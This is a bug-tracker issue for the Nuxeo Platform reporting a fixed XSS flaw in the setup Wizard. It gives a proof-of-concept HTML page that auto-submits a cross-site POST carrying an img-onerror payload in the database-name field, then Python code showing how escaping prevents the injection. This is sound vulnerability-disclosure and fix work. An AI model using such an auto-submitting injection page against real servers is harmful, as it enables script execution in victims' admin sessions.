Nuxeo Platform / NXP-20277

Fix XSS in Wizard

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Minor
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: 7.10-HF18, 8.10
    • Component/s: Wizard

      Description

      To be tested with Firefox.
      To reproduce:

      • Open the attached XSS.html
      • The alert is displayed

      Content of XSS.html:

      <body onload='go();'>
      <form method=post name=i action='http://localhost:8080/nuxeo/DB'>
      <input type='hidden' name='refresh' value='false'>
      <input type='hidden' name='nuxeo.dbtemplate' value='postgresql'>
      <input type='hidden' name='nuxeo.db.name' value='n"><img src=x onerror=alert(/XSS/)>'>
      <input type='hidden' name='nuxeo.db.user' value='nuxeo'>
      <input type='hidden' name='nuxeo.db.password' value='password'>
      <input type='hidden' name='nuxeo.db.host' value='localhost'>
      <input type='hidden' name='nuxeo.db.port' value='5432'>
      <input type='hidden' name='nuxeo.dbnosqltemplate' value='none'>
      <input type='submit' value='PoC' name='r'>
      </form>
      <script>
      function go() {
      document.i.r.click();
      }
      </script>
      </body>
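The attached page works because the wizard writes the submitted `nuxeo.db.name` value back into an HTML attribute without encoding it, so a value containing `">` closes the attribute and the element and lets the remainder be parsed as new markup. The following is an added illustration, not Nuxeo's own wizard code or its actual fix: it renders a form field the vulnerable way and the encoded way, then runs both through Python's `html.parser` to show which elements a browser-like parser would actually see. The field name and the rendering functions are assumptions for the demonstration; the payload value is copied from the issue's XSS.html.

```python
import html
from html.parser import HTMLParser

# Value of the nuxeo.db.name field from the issue's XSS.html (copied as test input)
DB_NAME_PAYLOAD = 'n"><img src=x onerror=alert(/XSS/)>'


def render_unescaped(field, value):
    """Vulnerable pattern (assumed, for illustration): the submitted value is
    concatenated straight into the value attribute of the re-displayed form."""
    return f'<input type="text" name="{field}" value="{value}">'


def render_escaped(field, value):
    """Fixed pattern: HTML-attribute-encode the value before reflecting it.
    html.escape with quote=True turns &, <, >, " and ' into entities, so the
    value can no longer terminate the attribute or start a new element."""
    return f'<input type="text" name="{field}" value="{html.escape(value, quote=True)}">'


class TagCollector(HTMLParser):
    """Collects every start tag (with its attributes) the parser encounters."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def parse_tags(markup):
    """Return [(tag_name, {attr: value}), ...] for the elements in markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def tag_names(markup):
    return [name for name, _ in parse_tags(markup)]


if __name__ == "__main__":
    vulnerable = render_unescaped("nuxeo.db.name", DB_NAME_PAYLOAD)
    fixed = render_escaped("nuxeo.db.name", DB_NAME_PAYLOAD)
    # Unescaped: the parser sees a second element (img) carrying an event handler.
    print("unescaped ->", tag_names(vulnerable))
    # Escaped: only the input element exists; the payload is just its value text.
    print("escaped   ->", tag_names(fixed))
    print("round-tripped value:", parse_tags(fixed)[0][1]["value"] == DB_NAME_PAYLOAD)
```

The escaped rendering still preserves the user's input exactly (the parser decodes the entities back to the original string as the attribute value), which is the property a fix needs: the data is unchanged, only its interpretation as markup is removed. Attribute encoding addresses the reflection; the reproduction also relies on the wizard accepting a cross-site auto-submitted POST, which a per-session token on the wizard form would block independently.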
      
